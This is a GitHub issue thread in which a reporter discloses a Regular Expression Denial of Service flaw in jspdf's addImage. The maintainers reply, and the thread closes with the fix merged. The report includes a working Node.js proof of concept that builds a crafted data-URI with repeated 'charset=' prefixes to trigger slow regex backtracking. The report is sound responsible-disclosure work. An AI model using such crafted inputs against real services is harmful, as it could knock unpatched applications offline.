ReDoS in jspdf #3090

yetingli · 2021-02-09T05:59:15Z

Hi,

I would like to report a Regular Expression Denial of Service (REDoS) vulnerability in jspdf.

It allows cause a denial of service when adding images.

You can execute the code below to reproduce the vulnerability.

const fs = require("fs");
const { jsPDF } = require("jspdf")


function build_blank(n) {
var ret = "data:/"
for (var i = 0; i < n; i++) {
ret += "charset="
}
return ret + "!";
}
 
const doc = new jsPDF();
doc.text("Hello world1111!", 10, 10);

var imageData = "data:image/png;base64,"

var Octocat = fs.readFileSync("psb.png", { encoding: "latin1" });
doc.addImage(build_blank(30) + imageData, "test", 10, 40, 180, 180, undefined, "SLOW");


doc.save("a4ffff.pdf"); // will save the file in the current working directory
console.log("type:" + typeof(doc.addImage))

Best,
Yeting Li

HackbrettXXX · 2021-02-10T09:46:27Z

Thanks for the issue report. I think we need to fix this regexp. Could you prepare a PR?

yetingli · 2021-02-10T10:24:08Z

Thanks for the issue report. I think we need to fix this regexp. Could you prepare a PR?

Thank you for your reply, I'd be happy to oblige.

HackbrettXXX · 2021-03-31T13:54:47Z

Fixed in #3091.

yetingli mentioned this issue Feb 10, 2021

fix the ReDoS-vulnerable regexp #3091

Merged

HackbrettXXX closed this as completed Mar 31, 2021

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ReDoS in jspdf #3090

ReDoS in jspdf #3090

yetingli commented Feb 9, 2021

HackbrettXXX commented Feb 10, 2021

yetingli commented Feb 10, 2021

HackbrettXXX commented Mar 31, 2021

ReDoS in jspdf #3090

ReDoS in jspdf #3090

Comments

yetingli commented Feb 9, 2021

HackbrettXXX commented Feb 10, 2021

yetingli commented Feb 10, 2021

HackbrettXXX commented Mar 31, 2021